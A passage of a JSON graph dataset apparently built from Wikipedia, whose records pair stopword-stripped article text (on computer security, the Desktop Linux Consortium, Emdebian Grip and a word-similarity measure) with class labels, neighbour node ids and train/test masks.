    "text": "Computer_security:computer security computer security cybersecurity information technology security security protection computer systems theft damage hardware software electronic data well disruption misdirection services provide field becoming important due increased reliance computer systems internet wireless network standards bluetooth wi-fi due growth smart devices including smartphones televisions various devices constitute internet things due complexity terms politics technology cybersecurity also one major challenges contemporary world vulnerability weakness design implementation operation internal control vulnerabilities discovered documented common vulnerabilities exposures cve database exploitable vulnerability one least one working attack exploit exists vulnerabilities often hunted exploited aid automated tools manually using customized scripts secure computer system important understand attacks made threats typically classified one categories backdoor computer system cryptosystem algorithm secret method bypassing normal authentication security controls may exist number reasons including original design poor configuration may added authorized party allow legitimate access attacker malicious reasons regardless motives existence create vulnerability denial service attacks dos designed make machine network resource unavailable intended users attackers deny service individual victims deliberately entering wrong password enough consecutive times cause victims account locked may overload capabilities machine network block users network attack single ip address blocked adding new firewall rule many forms distributed denial service ddos attacks possible attack comes large number points – defending much difficult attacks originate zombie computers botnet range techniques possible including reflection amplification attacks innocent systems fooled sending traffic victim unauthorized user gaining physical access computer likely able directly copy data may also compromise security making operating system modifications installing software worms keyloggers covert listening devices using wireless mice even system protected standard security measures may able by-passed booting another operating system tool cd-rom bootable media disk encryption trusted platform module designed prevent attacks eavesdropping act surreptitiously listening private conversation typically hosts network instance programs carnivore narusinsight used fbi nsa eavesdrop systems internet service providers even machines operate closed system i.e. contact outside world eavesdropped upon via monitoring faint electromagnetic transmissions generated hardware tempest specification nsa referring attacks surfacing 2017 new class multi-vector polymorphic cyber threats surfaced combined several types attacks changed form avoid cyber security controls spread threats classified fifth generation cyber attacks phishing attempt acquire sensitive information usernames passwords credit card details directly users phishing typically carried email spoofing instant messaging often directs users enter details fake website whose look feel almost identical legitimate one fake website often ask personal information log-in passwords information used gain access individual real account real website preying victim trust phishing classified form social engineering privilege escalation describes situation attacker level restricted access able without authorization elevate privileges access level example standard computer user may able exploit vulnerability system gain access restricted data even become root full unrestricted access system social engineering aims convince user disclose secrets passwords card numbers etc example impersonating bank contractor customer common scam involves fake ceo emails sent accounting finance departments early 2016 fbi reported scam cost us businesses 2bn two years may 2016 milwaukee bucks nba team victim type cyber scam perpetrator impersonating team president peter feigin resulting handover team employees 2015 w-2 tax forms spoofing act masquerading valid entity falsification data ip address username order gain access information resources one otherwise unauthorized obtain several types spoofing including tampering describes malicious modification products so-called evil maid attacks security services planting surveillance capability routers examples employee behavior big impact information security organizations cultural concepts help different segments organization work effectively work effectiveness towards information security within organization ″exploring relationship organizational culture information security culture″ provides following definition information security culture ″isc totality patterns behavior organization contribute protection information kinds.″ andersson reimers 2014 found employees often see part organization information security effort often take actions ignore organizational information security best interests research shows information security culture needs improved continuously ″information security culture analysis change″ authors commented ″it never ending process cycle evaluation change maintenance.″ manage information security culture five steps taken pre-evaluation strategic planning operative planning implementation post-evaluation growth number computer systems increasing reliance upon individuals businesses industries governments means increasing number systems risk computer systems financial regulators financial institutions like u.s. securities exchange commission swift investment banks commercial banks prominent hacking targets cyber criminals interested manipulating markets making illicit gains web sites apps accept store credit card numbers brokerage accounts bank account information also prominent hacking targets potential immediate financial gain transferring money making purchases selling information black market in-store payment systems atms also tampered order gather customer account data pins computers control functions many utilities including coordination telecommunications power grid nuclear power plants valve opening closing water gas networks internet potential attack vector machines connected stuxnet worm demonstrated even equipment controlled computers connected internet vulnerable 2014 computer emergency readiness team division department homeland security investigated 79 hacking incidents energy companies vulnerabilities smart meters many use local radio cellular communications cause problems billing fraud aviation industry reliant series complex systems could attacked simple power outage one airport cause repercussions worldwide much system relies radio transmissions could disrupted controlling aircraft oceans especially dangerous radar surveillance extends 175 225 miles offshore also potential attack within aircraft europe pan-european network service newpens us nextgen program air navigation service providers moving create dedicated networks consequences successful attack range loss confidentiality loss system integrity air traffic control outages loss aircraft even loss life desktop computers laptops commonly targeted gather passwords financial account information construct botnet attack another target smartphones tablet computers smart watches mobile devices quantified self devices like activity trackers sensors cameras microphones gps receivers compasses accelerometers could exploited may collect personal information including sensitive health information wifi bluetooth cell phone networks devices could used attack vectors sensors might remotely activated successful breach increasing number home automation devices nest thermostat also potential targets large corporations common targets many cases aimed financial gain identity theft involves data breaches loss millions clients credit card details home depot staples target corporation recent breach equifax cyberattacks ordered foreign governments governments engage cyberwarfare intent spread propaganda sabotage spy targets many people believe russian government played major role us presidential election 2016 using twitter facebook affect results election medical records targeted use general identify theft health insurance fraud impersonating patients obtain prescription drugs recreational purposes resale although cyber threats continue increase 62 organizations increase security training business 2015 attacks financially motivated however example security firm hbgary federal suffered serious series attacks 2011 hacktivist group anonymous retaliation firm ceo claiming infiltrated group sony pictures attack 2014 motive appears embarrass data leaks cripple company wiping workstations servers vehicles increasingly computerized engine timing cruise control anti-lock brakes seat belt tensioners door locks airbags advanced driver-assistance systems many models additionally connected cars may use wifi bluetooth communicate onboard consumer devices cell phone network self-driving cars expected even complex systems carry security risk issues gained wide attention simple examples risk include malicious compact disc used attack vector car onboard microphones used eavesdropping however access gained car internal controller area network danger much greater – widely publicized 2015 test hackers remotely carjacked vehicle 10 miles away drove ditch manufacturers reacting number ways tesla 2016 pushing security fixes air cars computer systems area autonomous vehicles september 2016 united states department transportation announced initial safety standards called states come uniform policies government military computer systems commonly attacked activists foreign powers local regional government infrastructure traffic light controls police intelligence agency communications personnel records student records financial systems also potential targets largely computerized passports government id cards control access facilities use rfid vulnerable cloning internet things iot network physical objects devices vehicles buildings embedded electronics software sensors network connectivity enables collect exchange data – concerns raised developed without appropriate consideration security challenges involved iot creates opportunities direct integration physical world computer-based systems also provides opportunities misuse particular internet things spreads widely cyber attacks likely become increasingly physical rather simply virtual threat front door lock connected internet locked/unlocked phone criminal could enter home press button stolen hacked phone people could stand lose much credit card numbers world controlled iot-enabled devices thieves also used electronic means circumvent non-internet-connected hotel door locks medical devices either successfully attacked potentially deadly vulnerabilities demonstrated including in-hospital diagnostic equipment implanted devices including pacemakers insulin pumps many reports hospitals hospital organizations getting hacked including ransomware attacks windows xp exploits viruses data breaches sensitive data stored hospital servers 28 december 2016 us food drug administration released recommendations medical device manufacturers maintain security internet-connected devices – structure enforcement distributed generation systems risk cyber attack real according daily energy insider attack could cause loss power large area long period time attack could severe consequences natural disaster district columbia considering creating distributed energy resources der authority within city goal customers insight energy use giving local electric utility pepco chance better estimate energy demand d.c. proposal however would allow third-party vendors create numerous points energy distribution could potentially create opportunities cyber attackers threaten electric grid serious financial damage caused security breaches standard model estimating cost incident data available made public organizations involved several computer security consulting firms produce estimates total worldwide losses attributable virus worm attacks hostile digital acts general 2003 loss estimates firms range 13 billion worms viruses 226 billion forms covert attacks reliability estimates often challenged underlying methodology basically anecdotal security breaches continue cost businesses billions dollars survey revealed 66 security staffs believe senior leadership takes cyber precautions strategic priority however reasonable estimates financial cost security breaches actually help organizations make rational investment decisions according classic gordon-loeb model analyzing optimal investment level information security one conclude amount firm spends protect information generally small fraction expected loss i.e. expected value loss resulting cyber/information security breach physical security motivations breaches computer security vary attackers thrill-seekers vandals activists others criminals looking financial gain state-sponsored attackers common well resourced started amateurs markus hess hacked kgb recounted clifford stoll cuckoo egg additionally recent attacker motivations traced back extremist organizations seeking gain political advantage disrupt social agendas growth internet mobile technologies inexpensive computing devices led rise capabilities also risk environments deemed vital operations critical targeted environments susceptible compromise led series proactive studies migrate risk taking consideration motivations type actors several stark differences exist hacker motivation nation state actors seeking attack based ideological preference standard part threat modelling particular system identify might motivate attack system might motivated breach level detail precautions vary depending system secured home personal computer bank classified military network face different threats even underlying technologies use similar computer security countermeasure action device procedure technique reduces threat vulnerability attack eliminating preventing minimizing harm cause discovering reporting corrective action taken common countermeasures listed following sections security design alternately secure design means software designed ground secure case security considered main feature techniques approach include open security architecture organization defines security architecture design artifacts describe security controls security countermeasures positioned relate overall information technology architecture controls serve purpose maintain system quality attributes confidentiality integrity availability accountability assurance services techopedia defines security architecture unified security design addresses necessities potential risks involved certain scenario environment also specifies apply security controls design process generally reproducible key attributes security architecture state computer security conceptual ideal attained use three processes threat prevention detection response processes based various policies system components include following today computer security comprises mainly preventive measures like firewalls exit procedure firewall defined way filtering network data host network another network internet implemented software running machine hooking network stack case unix-based operating systems linux built operating system kernel provide real-time filtering blocking another implementation so-called physical firewall consists separate machine filtering network traffic firewalls common amongst machines permanently connected internet organizations turning big data platforms apache hadoop extend data accessibility machine learning detect advanced persistent threats however relatively organisations maintain computer systems effective detection systems fewer still organized response mechanisms place result reuters points companies first time report losing electronic theft data physical stealing assets primary obstacle effective eradication cyber crime could traced excessive reliance firewalls automated detection systems yet basic evidence gathering using packet capture appliances puts criminals behind bars vulnerability management cycle identifying remediating mitigating vulnerabilities especially software firmware vulnerability management integral computer security network security vulnerabilities discovered vulnerability scanner analyzes computer system search known vulnerabilities open ports insecure software configuration susceptibility malware beyond vulnerability scanning many organizations contract outside security auditors run regular penetration tests systems identify vulnerabilities sectors contractual requirement formal verification correctness computer systems possible yet common operating systems formally verified include sel4 sysgo pikeos – make small percentage market two factor authentication method mitigating unauthorized access system sensitive information requires something know password pin something card dongle cellphone piece hardware increases security unauthorized person needs gain access social engineering direct computer access physical attacks prevented non-computer means difficult enforce relative sensitivity information training often involved help mitigate risk even highly disciplined environments e.g military organizations social engineering attacks still difficult foresee prevent enoculation derived inoculation theory seeks prevent social engineering fraudulent tricks traps instilling resistance persuasion attempts exposure similar related attempts possible reduce attacker chances keeping systems date security patches updates using security scanner or/and hiring competent people responsible security statement ambiguous even systems developed competent people get penetrated effects data loss/damage reduced careful backing insurance hardware may source insecurity microchip vulnerabilities maliciously introduced manufacturing process hardware-based assisted computer security also offers alternative software-only computer security using devices methods dongles trusted platform modules intrusion-aware cases drive locks disabling usb ports mobile-enabled access may considered secure due physical access sophisticated backdoor access required order compromised covered detail one use term computer security refers technology used implement secure operating systems 1980s united states department defense dod used orange book standards current international standard iso/iec 15408 common criteria defines number progressively stringent evaluation assurance levels many common operating systems meet eal4 standard methodically designed tested reviewed formal verification required highest levels means uncommon example eal6 semiformally verified design tested system integrity-178b used airbus a380 several military jets software engineering secure coding aims guard accidental introduction security vulnerabilities also possible create software designed ground secure systems secure design beyond formal verification aims prove correctness algorithms underlying system important cryptographic protocols example within computer systems two many security models capable enforcing privilege separation access control lists acls capability-based security using acls confine programs proven insecure many situations host computer tricked indirectly allowing restricted file access issue known confused deputy problem also shown promise acls giving access object one person never guaranteed practice problems resolved capabilities mean practical flaws exist acl-based systems designers certain utilities must take responsibility ensure introduce flaws capabilities mostly restricted research operating systems commercial oss still use acls capabilities however also implemented language level leading style programming essentially refinement standard object-oriented design open source project area e language end-user widely recognized weakest link security chain estimated 90 security incidents breaches involve kind human error among commonly recorded forms errors misjudgment poor password management inability recognize misleading urls identify fake websites dangerous email attachments human component cyber risk particularly relevant determining global cyber risk organization facing security awareness training levels provides formal compliance regulatory industry mandates considered essential reducing cyber risk protecting individuals companies great majority cyber threats focus end-user represents profound cultural change many security practitioners traditionally approached cybersecurity exclusively technical perspective moves along lines suggested major security centers develop culture cyber awareness within organization recognizing security aware user provides important line defense cyber attacks responding forcefully attempted security breaches manner one would attempted physical security breaches often difficult variety reasons incident response organized approach addressing managing aftermath computer security incident compromise goal preventing breach thwarting cyberattack incident identified managed time intrusion typically escalates impactful event data breach system failure intended outcome computer security incident response plan limit damage reduce recovery time costs responding compromises quickly mitigate exploited vulnerabilities restore services processes minimize impact losses incident response planning allows organization establish series best practices stop intrusion causes damage typical incident response plans contain set written instructions outline organization response cyberattack without documented plan place organization may successfully detect intrusion compromise stakeholders may understand roles processes procedures escalation slowing organizations response resolution four key components computer security incident response plan illustrative examples different types computer security breaches given 1988 60,000 computers connected internet mainframes minicomputers professional workstations 2 november 1988 many started slow running malicious code demanded processor time spread computers – first internet computer worm software traced back 23-year-old cornell university graduate student robert tappan morris jr. said wanted count many machines connected internet 1994 hundred intrusions made unidentified crackers rome laboratory us air force main command research facility using trojan horses hackers able obtain unrestricted access rome networking systems remove traces activities intruders able obtain classified files air tasking order systems data furthermore able penetrate connected networks national aeronautics space administration goddard space flight center wright-patterson air force base defense contractors private sector organizations posing trusted rome center user early 2007 american apparel home goods company tjx announced victim unauthorized computer systems intrusion hackers accessed system stored data credit card debit card check merchandise return transactions 2010 computer worm known stuxnet reportedly ruined almost one-fifth iran nuclear centrifuges disrupting industrial programmable logic controllers plcs targeted attack generally believed launched israel united states – although neither publicly admitted early 2013 documents provided edward snowden published washington post guardian exposing massive scale nsa global surveillance also indications nsa may inserted backdoor nist standard encryption standard later withdrawn due widespread criticism nsa additionally revealed tapped links google data centres 2013 2014 russian/ukrainian hacking ring known rescator broke target corporation computers 2013 stealing roughly 40 million credit cards home depot computers 2014 stealing 53 56 million credit card numbers warnings delivered corporations ignored physical security breaches using self checkout machines believed played large role malware utilized absolutely unsophisticated uninteresting says jim walter director threat intelligence operations security technology company mcafee – meaning heists could easily stopped existing antivirus software administrators responded warnings size thefts resulted major attention state federal united states authorities investigation ongoing april 2015 office personnel management discovered hacked year earlier data breach resulting theft approximately 21.5 million personnel records handled office office personnel management hack described federal officials among largest breaches government data history united states data targeted breach included personally identifiable information social security numbers names dates places birth addresses fingerprints current former government employees well anyone undergone government background check believed hack perpetrated chinese hackers july 2015 hacker group known impact team successfully breached extramarital relationship website ashley madison created avid life media group claimed taken company data user data well breach impact team dumped emails company ceo prove point threatened dump customer data unless website taken permanently avid life media take site offline group released two compressed files one 9.7gb second 20gb second data dump avid life media ceo noel biderman resigned website remained functioning international legal issues cyber attacks complicated nature global base common rules judge eventually punish cyber crimes cyber criminals security firms agencies locate cybercriminal behind creation particular piece malware form cyber attack often local authorities take action due lack laws prosecute proving attribution cyber crimes cyber attacks also major problem law enforcement agencies computer viruses switch one country another one jurisdiction another – moving around world using fact n't capability globally police operations like internet someone given free plane tickets online criminals world use techniques dynamic dns fast flux bullet proof servers add difficulty investigation enforcement role government make regulations force companies organizations protect systems infrastructure information cyberattacks also protect national infrastructure national power-grid government regulatory role cyberspace complicated cyberspace seen virtual space remain free government intervention seen many today libertarian blockchain bitcoin discussions many government officials experts think government crucial need improved regulation mainly due failure private sector solve efficiently cybersecurity problem r. clarke said panel discussion rsa security conference san francisco believes industry responds threaten regulation industry n't respond threat follow hand executives private sector agree improvements necessary think government intervention would affect ability innovate efficiently daniel r. mccarthy analyzed public-private partnership cybersecurity reflected role cybersecurity broader constitution political order many different teams organisations exist including 14 april 2016 european parliament council european union adopted general data protection regulation gdpr eu 2016/679 gdpr became enforceable beginning 25 may 2018 provides data protection privacy individuals within european union eu european economic area eea gdpr requires business processes handle personal data built data protection design default gdpr also requires certain organizations appoint data protection officer dpo countries computer emergency response team protect network security since 2010 canada cyber security strategy functions counterpart document national strategy action plan critical infrastructure strategy three main pillars securing government systems securing vital private cyber systems helping canadians secure online also cyber incident management framework provide coordinated response event cyber incident canadian cyber incident response centre ccirc responsible mitigating responding threats canada critical infrastructure cyber systems provides support mitigate cyber threats technical support respond recover targeted cyber attacks provides online tools members canada critical infrastructure sectors posts regular cyber security bulletins operates online reporting tool individuals organizations report cyber incident inform general public protect online public safety canada partnered stop.think.connect coalition non-profit private sector government organizations launched cyber security cooperation program also run getcybersafe portal canadian citizens cyber security awareness month october public safety canada aims begin evaluation canada cyber security strategy early 2015 china central leading group internet security informatization established 27 february 2014 leading small group lsg communist party china headed general secretary xi jinping staffed relevant party state decision-makers lsg created overcome incoherent policies overlapping responsibilities characterized china former cyberspace decision-making mechanisms lsg oversees policy-making economic political cultural social military fields relate network security strategy lsg also coordinates major policy initiatives international arena promote norms standards favored chinese government emphasize principle national sovereignty cyberspace berlin starts national cyber defense initiative 16 june 2011 german minister home affairs officially opened new german ncaz national center cyber defense nationales cyber-abwehrzentrum located bonn ncaz closely cooperates bsi federal office information security bundesamt für sicherheit der informationstechnik bka federal police organisation bundeskriminalamt deutschland bnd federal intelligence service bundesnachrichtendienst mad military intelligence service amt für den militärischen abschirmdienst national organisations germany taking care national security aspects according minister primary task new organization founded 23 february 2011 detect prevent attacks national infrastructure mentioned incidents like stuxnet provisions cyber security incorporated rules framed information technology act 2000 national cyber security policy 2013 policy framework ministry electronics information technology meity aims protect public private infrastructure cyber attacks safeguard information personal information web users financial banking information sovereign data cert- nodal agency monitors cyber threats country post national cyber security coordinator also created prime minister office pmo indian companies act 2013 also introduced cyber law cyber security obligations part indian directors provisions cyber security incorporated rules framed information technology act 2000 update 2013 following cyber attacks first half 2013 government news media television station bank websites compromised national government committed training 5,000 new cybersecurity experts 2017 south korean government blamed northern counterpart attacks well incidents occurred 2009 2011 2012 pyongyang denies accusations 1986 computer fraud abuse act key legislation prohibits unauthorized access damage protected computers defined although various measures proposed – none succeeded 2013 executive order improving critical infrastructure cybersecurity signed prompted creation nist cybersecurity framework standardized government testing services general services administration gsa standardized penetration test service pre-vetted support service rapidly address potential vulnerabilities stop adversaries impact us federal state local governments services commonly referred highly adaptive cybersecurity services hacs listed us gsa advantage website see information penetration test standardized government penetration test services department homeland security dedicated division responsible response system risk management program requirements cybersecurity united states called national cyber security division division home us-cert operations national cyber alert system national cybersecurity communications integration center brings together government organizations responsible protecting computer networks networked infrastructure third priority federal bureau investigation fbi protect united states cyber-based attacks high-technology crimes along national white collar crime center nw3c bureau justice assistance bja part multi-agency task force internet crime complaint center also known ic3 addition specific duties fbi participates alongside non-profit organizations infragard criminal division united states department justice operates section called computer crime intellectual property section ccips charge investigating computer crime intellectual property crime specialized search seizure digital evidence computers networks 2017 ccips published framework vulnerability disclosure program online systems help organizations clearly describe authorized vulnerability disclosure discovery conduct thereby substantially reducing likelihood described activities result civil criminal violation law computer fraud abuse act 18 u.s.c § 1030 united states cyber command also known uscybercom tasked defense specified department defense information networks ensures security integrity governance government military infrastructure assets role protection civilian networks u.s. federal communications commission role cybersecurity strengthen protection critical communications infrastructure assist maintaining reliability networks disasters aid swift recovery ensure first responders access effective communications services food drug administration issued guidance medical devices national highway traffic safety administration concerned automotive cybersecurity criticized government accountability office following successful attacks airports claimed attacks airplanes federal aviation administration devoted funding securing systems board planes private manufacturers aircraft communications addressing reporting system concerns also raised future next generation air transportation system computer emergency response team name given expert groups handle computer security incidents us two distinct organization exist although work closely together growing concern cyberspace become next theater warfare mark clayton christian science monitor described article titled new cyber arms race future wars fought soldiers guns planes drop bombs also fought click mouse half world away unleashes carefully weaponized computer programs disrupt destroy critical industries like utilities transportation communications energy attacks could also disable military networks control movement troops path jet fighters command control warships led new terms cyberwarfare cyberterrorism united states cyber command created 2009 many countries similar forces critical voices question whether cybersecurity significant threat made cybersecurity fast-growing field concerned reducing organizations risk hack data breach according research enterprise strategy group 46 organizations say problematic shortage cybersecurity skills 2016 28 2015 commercial government non-governmental organizations employ cybersecurity professionals fastest increases demand cybersecurity workers industries managing increasing volumes consumer data finance health care retail however use term cybersecurity prevalent government job descriptions typical cyber security job titles descriptions include student programs also available people interested beginning career cybersecurity meanwhile flexible effective option information security professionals experience levels keep studying online security training including webcasts wide range certified courses also available united kingdom nationwide set cyber security forums known u.k cyber security forum established supported government cyber security strategy order encourage start-ups innovation address skills gap identified u.k government following terms used regards computer security explained",
    "neighbors": [
      11,
      10252,
      20,
      4117,
      4119,
      10264,
      6169,
      30,
      2082,
      2084,
      6184,
      10290,
      10291,
      2111,
      6209,
      4163,
      8259,
      2118,
      8262,
      2122,
      6222,
      6224,
      10322,
      10325,
      89,
      8288,
      6241,
      4194,
      2148,
      8292,
      4198,
      6246,
      2152,
      10341,
      2154,
      107,
      4206,
      8302,
      2162,
      4212,
      119,
      10366,
      8320,
      8329,
      8333,
      6288,
      10385,
      150,
      6295,
      8344,
      4249,
      10392,
      6308,
      2213,
      6312,
      174,
      176,
      8368,
      6323,
      186,
      10429,
      8386,
      10437,
      4299,
      4303,
      4307,
      2262,
      10455,
      6360,
      8410,
      6364,
      6368,
      2275,
      6373,
      239,
      2294,
      4348,
      10492,
      256,
      2305,
      6402,
      6406,
      10502,
      8459,
      8462,
      8464,
      8469,
      4380,
      4382,
      8478,
      4389,
      2354,
      310,
      311,
      316,
      2367,
      8518,
      4423,
      331,
      8526,
      10574,
      4435,
      10580,
      8548,
      4453,
      8551,
      10600,
      2409,
      4464,
      8563,
      8567,
      10615,
      8575,
      8580,
      10631,
      6541,
      4496,
      8603,
      2461,
      10658,
      419,
      420,
      427,
      10677,
      8632,
      10682,
      8635,
      6588,
      8637,
      8640,
      8641,
      4552,
      4554,
      2508,
      4559,
      8656,
      4562,
      467,
      8661,
      8667,
      8668,
      6621,
      10718,
      4575,
      8674,
      483,
      4582,
      8678,
      8682,
      2539,
      499,
      6643,
      8692,
      10740,
      6648,
      4601,
      2554,
      8699,
      2558,
      510,
      10756,
      519,
      10766,
      4626,
      8731,
      10785,
      10788,
      551,
      552,
      2601,
      6699,
      8750,
      2609,
      8753,
      6708,
      8764,
      10813,
      2629,
      8773,
      584,
      4689,
      8787,
      10835,
      2655,
      2656,
      6754,
      612,
      8805,
      2664,
      10858,
      6766,
      2671,
      2675,
      6772,
      4725,
      639,
      6786,
      651,
      10894,
      2705,
      4753,
      4755,
      2709,
      665,
      8859,
      10909,
      672,
      4772,
      2732,
      2733,
      688,
      2737,
      10928,
      10933,
      2742,
      10936,
      700,
      10940,
      2750,
      4798,
      704,
      10944,
      2756,
      8904,
      715,
      4811,
      10962,
      731,
      2779,
      4830,
      8930,
      743,
      8935,
      745,
      4843,
      755,
      2804,
      11001,
      763,
      2812,
      6907,
      767,
      4863,
      2818,
      6916,
      774,
      8974,
      8978,
      4883,
      8980,
      4892,
      6947,
      11044,
      8998,
      4904,
      11048,
      2859,
      11052,
      813,
      4912,
      823,
      11068,
      6975,
      6980,
      838,
      839,
      4936,
      2889,
      11081,
      4941,
      4945,
      4948,
      2901,
      9049,
      4956,
      9052,
      9055,
      11112,
      2924,
      4972,
      2926,
      11116,
      2928,
      2931,
      7030,
      4988,
      895,
      9089,
      899,
      2947,
      5002,
      2959,
      5007,
      5010,
      918,
      9112,
      2969,
      11162,
      2975,
      928,
      931,
      11172,
      939,
      943,
      7091,
      11188,
      9145,
      11198,
      5057,
      11202,
      7107,
      9160,
      11211,
      9165,
      3024,
      5077,
      7135,
      3041,
      5089,
      7139,
      999,
      11244,
      1006,
      7153,
      9203,
      7156,
      1020,
      9215,
      1024,
      7174,
      9224,
      5136,
      9233,
      11281,
      7187,
      3094,
      9242,
      1052,
      9248,
      9256,
      5174,
      11319,
      5176,
      1083,
      5179,
      7228,
      1087,
      3139,
      9283,
      1094,
      5192,
      9293,
      7248,
      11347,
      1111,
      1114,
      7260,
      7264,
      9313,
      3172,
      3178,
      5226,
      5230,
      1140,
      1143,
      1147,
      5245,
      5246,
      7294,
      9341,
      9345,
      1155,
      9356,
      3223,
      1179,
      5279,
      9375,
      3234,
      5282,
      5284,
      7336,
      1193,
      3242,
      3243,
      7337,
      11432,
      11435,
      1200,
      7354,
      11451,
      9404,
      3262,
      7364,
      3270,
      7368,
      11464,
      5325,
      11470,
      11473,
      11474,
      9432,
      7385,
      3290,
      5341,
      11486,
      11487,
      9442,
      1251,
      1254,
      7404,
      5363,
      7411,
      1271,
      5373,
      9469,
      1279,
      9473,
      3337,
      7436,
      5389,
      7437,
      9488,
      11537,
      11542,
      7449,
      3354,
      5404,
      3360,
      1314,
      1315,
      1318,
      3366,
      7465,
      11567,
      1330,
      5427,
      3381,
      11576,
      5433,
      11577,
      5435,
      3390,
      1344,
      3393,
      9537,
      7491,
      5446,
      9545,
      11594,
      1355,
      7503,
      5457,
      9553,
      1364,
      1366,
      5464,
      1369,
      11609,
      3419,
      7515,
      11611,
      7520,
      5473,
      9569,
      7526,
      7527,
      7528,
      3433,
      5490,
      5491,
      5495,
      11639,
      7547,
      7557,
      9607,
      5512,
      7568,
      3473,
      1429,
      7578,
      11681,
      5539,
      9635,
      11684,
      3495,
      9640,
      3500,
      1453,
      9646,
      7601,
      7606,
      1465,
      5561,
      5563,
      3517,
      5566,
      5568,
      3521,
      1474,
      3525,
      1479,
      1480,
      3529,
      7624,
      5579,
      3532,
      9677,
      5585,
      5589,
      9688,
      3552,
      7652,
      1511,
      3560,
      5608,
      9710,
      9713,
      9714,
      3572,
      1525,
      3577,
      5625,
      1540,
      5636,
      3592,
      7692,
      9745,
      3604,
      7708,
      1567,
      3616,
      9762,
      3619,
      1573,
      7717,
      5673,
      9771,
      1580,
      3629,
      5677,
      5682,
      1589,
      5689,
      7739,
      1597,
      7741,
      9791,
      7759,
      9815,
      3673,
      5722,
      9817,
      1634,
      7780,
      3686,
      9833,
      7793,
      3698,
      7794,
      3700,
      3701,
      9846,
      3709,
      9854,
      9855,
      1665,
      7809,
      5774,
      7827,
      5780,
      7834,
      7835,
      9887,
      9901,
      1711,
      7855,
      7856,
      3774,
      9926,
      9932,
      7887,
      1746,
      7893,
      7899,
      1758,
      1764,
      9958,
      1768,
      7927,
      5880,
      1785,
      3843,
      5893,
      1801,
      10003,
      1812,
      1815,
      1820,
      10016,
      1830,
      3880,
      3887,
      7983,
      3890,
      1843,
      10036,
      7989,
      7991,
      7996,
      1861,
      8017,
      3924,
      8023,
      5981,
      1886,
      3937,
      1890,
      3941,
      3944,
      10092,
      8047,
      6002,
      3955,
      8053,
      1912,
      1914,
      10110,
      8066,
      3972,
      1926,
      1928,
      8080,
      10131,
      1941,
      6043,
      8094,
      8103,
      1961,
      4016,
      6064,
      1970,
      10166,
      1975,
      8122,
      1979,
      10170,
      4032,
      10190,
      8146,
      10196,
      8150,
      8155,
      4062,
      4063,
      6110,
      10207,
      4067,
      10213,
      4071,
      2027,
      4081,
      4085,
      10232,
      2041,
      2047
    ],
    "mask": "Test"
  },
  {
    "node_id": 2559,
    "label": 2,
    "text": "Desktop_Linux_Consortium:desktop linux consortium desktop linux consortium dlc non-profit organization aims enhancing promoting use linux operating system desktop computers founded 4 february 2003",
    "neighbors": [
      10694,
      10376,
      7983,
      10192,
      823,
      5721,
      1406
    ],
    "mask": "Test"
  },
  {
    "node_id": 2560,
    "label": 3,
    "text": "Emdebian_Grip:emdebian grip emdebian grip discontinued small-footprint linux distribution based compatible debian compared debian provides fine-grained control package selection size dependencies content enabling way creation small efficient debian packages use resource-limited embedded systems result reduced installation size one main benefits coming emdebian grip emdebian grip project terminated available updates planned new releases leaving version 3.1 based debian 7.1 wheezy longer supported latest stable release emdebian grip re-packs package files made available debian removing unneeded files man pages info documents documentation unwanted translation files emdebian grip debian distribution builder command package processes package compiled architectures supported debian generates equivalent emdebian grip package way binaries maintainer scripts dependencies original debian packages left untouched overall size installation footprint packages reduced packages created emdebian grip recompiled completely binary compatible debian result emdebian grip maintains much compatibility possible debian even possible mix emdebian debian packages even migrate existing debian system emdebian grip emdebian grip provides complete package repositories seven architectures i386 amd64 powerpc armhf armel mips mipsel included support standard debian tools like functional changes emdebian grip compared base debian releases since version 3.0 emdebian grip suites codenames include additional -grip suffix compared equivalent debian suites codenames july 13 2014 end-of-life notice posted project web site announced updates emdebian grip stopped leaving version 3.1 based debian 7.1 wheezy longer supported latest stable release main reasons stated cause ending project lack embedded devices provide support expandable storage much work involved preparing updates releasing new versions",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      3618,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      10817,
      10333,
      97,
      8298,
      7285,
      9335,
      2168,
      633,
      1147,
      3197,
      1150,
      2179,
      6787,
      7812,
      8326,
      10883,
      6797,
      2195,
      9366,
      6296,
      7325,
      1694,
      9887,
      3241,
      3248,
      6837,
      8388,
      10436,
      9932,
      5840,
      7382,
      8410,
      1761,
      6369,
      1253,
      4841,
      5363,
      2811,
      7938,
      10499,
      4360,
      1804,
      6412,
      273,
      11539,
      1813,
      5397,
      1304,
      10016,
      2345,
      7983,
      304,
      823,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      10590,
      8551,
      5492,
      2424,
      394,
      3978,
      4493,
      7057,
      11155,
      11667,
      8092,
      3487,
      1952,
      421,
      4011,
      9646,
      11184,
      2995,
      9141,
      6075,
      9660,
      6078,
      9151,
      8136,
      5067,
      8147,
      6128,
      5619,
      10235
    ],
    "mask": "Train"
  },
  {
    "node_id": 2561,
    "label": 0,
    "text": "Second-order_co-occurrence_pointwise_mutual_information:second-order co-occurrence pointwise mutual information computational linguistics second-order co-occurrence pointwise mutual information semantic similarity measure assess degree association two given words uses pointwise mutual information pmi sort lists important neighbor words two target words large corpus pmi-ir method used altavista advanced search query syntax calculate probabilities note near search operator altavista essential operator pmi-ir method however longer use altavista means implementation point view possible use pmi-ir method form new systems case algorithmic point view advantage using soc-pmi calculate similarity two words co-occur frequently co-occur neighboring words example british national corpus bnc used source frequencies contexts method considers words common lists aggregate pmi values opposite list calculate relative semantic similarity define pointwise mutual information function words formula_1 formula_3 tells us many times type formula_4 appeared entire corpus formula_5 tells us many times word formula_4 appeared word formula_7 context window formula_8 total number tokens corpus word formula_7 define set words formula_10 sorted descending order pmi values formula_7 taken top-most formula_12 words formula_13 set formula_10 contains words formula_15 rule thumb used choose value formula_12 formula_12-pmi summation function word defined respect another word word formula_21 respect word formula_22 formula_24 sums positive pmi values words set formula_25 also common words set formula_26 words function actually aggregates positive pmi values semantically close words formula_22 also common formula_21 list formula_29 value greater 1 formula_12-pmi summation function word formula_21 respect word formula_22 formula_33 formula_12-pmi summation function word formula_22 respect word formula_21 formula_37 respectively finally semantic pmi similarity function two words formula_21 formula_22 defined semantic word similarity normalized provides similarity score formula_43 formula_44 inclusively normalization semantic similarity algorithm returns normalized score similarity two words takes arguments two words formula_45 formula_46 maximum value formula_47 returned semantic similarity function sim returns similarity score 0 1 inclusively example algorithm returns 0.986 words cemetery graveyard formula_48 soc-pmi method",
    "neighbors": [
      1890,
      11206
    ],
    "mask": "Test"
  },
  {
